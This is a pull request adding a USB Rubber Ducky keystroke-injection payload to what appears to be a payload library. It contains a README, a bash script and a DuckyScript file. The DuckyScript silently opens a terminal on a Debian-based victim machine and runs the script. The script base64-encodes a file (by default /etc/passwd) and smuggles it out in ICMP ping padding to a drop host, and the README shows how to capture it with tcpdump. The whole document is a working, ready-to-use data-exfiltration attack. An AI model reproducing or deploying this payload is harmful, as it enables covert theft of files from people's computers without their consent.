### PR TITLE
"Linux" ICMP Data Exfiltration

### DIFF
--- a/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/README.md
+++ b/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/README.md
@@ -1,0 +1,52 @@
+# ICMP Data Exfiltration
+
+- Title:         ICMP Data Exfiltration
+- Author:        TW-D
+- Version:       1.0
+- Targets:       Debian-Based Linux Distributions
+- Category:      Exfiltration
+
+## Description
+
+Exfiltrates a local file from a victim machine using the native "ping" utility.
+The file is first converted to "Base64", then divided into 16-byte fragments.
+The "ping" utility is then used to transmit the data to a receiving host.
+
+__Note :__ *The "base64" and "ping" utilities are required.*
+
+## Configuration
+
+In the "payload.txt" file, replace the values of the following constants :
+
+```
+
+REM ---
+REM USB Rubber Ducky label.
+REM ---
+DEFINE #RD_LABEL DUCKY
+
+REM ---
+REM Absolute path of the file to be exfiltrated.
+REM ---
+DEFINE #TARGET_FILE /etc/passwd
+
+REM ---
+REM IP address or domain receiving ICMP packets.
+REM ---
+DEFINE #DROP_HOST www.example.com
+
+```
+
+## Usage
+
+I) At the root of the USB Rubber Ducky, copy the "payload.sh" file.
+
+II) To receive data, you can use :
+
+```
+tcpdump -A --interface="<INTERFACE>" -l -n -q --snapshot-length=0 -t "icmp[icmptype] == 8"
+```
+
+> OR
+
+https://github.com/TW-D/tcpdump_ICMP-Data-Exfiltration/blob/main/tcpdump_icmp-data-exfiltration.rb

--- a/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.sh
+++ b/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.sh
@@ -1,0 +1,43 @@
+#!/bin/bash
+
+set -eo pipefail
+
+readonly TARGET_FILE="${1}"
+readonly DROP_HOST="${2}"
+
+set -u
+
+usage() {
+    echo "${BASH} ./payload.sh <TARGET_FILE> <DROP_HOST>"
+}
+
+if [ -z "${TARGET_FILE}" ]; then
+    echo "No TARGET_FILE has been defined."
+    usage
+    exit 2
+fi
+
+if [ -z "${DROP_HOST}" ]; then
+    echo "No DROP_HOST has been defined."
+    usage
+    exit 2
+fi
+
+IFS=$'\n'
+for chunk in $(base64 --wrap=16 "${TARGET_FILE}"); do
+    hex_digits=""
+
+    for ((hex_iterator=0; hex_iterator<"${#chunk}"; hex_iterator++)); do
+        hex_digits+="$(printf "%X" \'"${chunk:$hex_iterator:1}")"
+    done
+
+    if [ "${hex_iterator}" -lt 16 ]; then
+        sign_required="$((16 - hex_iterator))"
+
+        for ((sign_iterator=0; sign_iterator<"${sign_required}"; sign_iterator++)); do
+            hex_digits+="3D"
+        done
+    fi
+
+    ping -c 1 -p "${hex_digits}" -q -s 32 -W 1 -4 "${DROP_HOST}" &> /dev/null
+done

--- a/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.txt
+++ b/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.txt
@@ -1,0 +1,44 @@
+REM TITLE : ICMP Data Exfiltration
+REM AUTHOR : TW-D
+REM TARGET : Debian-Based Linux Distributions
+REM VERSION : 1.0
+REM CATEGORY : Exfiltration
+REM REQUIREMENT : DuckyScript 3.0
+
+ATTACKMODE HID STORAGE
+DELAY 15000
+
+REM ---
+REM USB Rubber Ducky label.
+REM ---
+DEFINE #RD_LABEL DUCKY
+
+REM ---
+REM Absolute path of the file to be exfiltrated.
+REM ---
+DEFINE #TARGET_FILE /etc/passwd
+
+REM ---
+REM IP address or domain receiving ICMP packets.
+REM ---
+DEFINE #DROP_HOST www.example.com
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+
+IF ( $_CAPSLOCK_ON ) THEN
+    CAPSLOCK
+    DELAY 500
+END_IF
+
+IF ( $_NUMLOCK_ON == FALSE ) THEN
+    NUMLOCK
+    DELAY 500
+END_IF
+
+CTRL-ALT t
+DELAY 2000
+STRINGLN  nohup "${BASH}" /media/"${USER}"/#RD_LABEL/payload.sh #TARGET_FILE #DROP_HOST &> /dev/null
+DELAY 1500
+STRINGLN exit
+
+RESTORE_HOST_KEYBOARD_LOCK_STATE


### PR DESCRIPTION
Exfiltrates a local file from a victim machine using the native "ping" utility. The file is first converted to "Base64", then divided into 16-byte fragments. The "ping" utility is then used to transmit the data to a receiving host.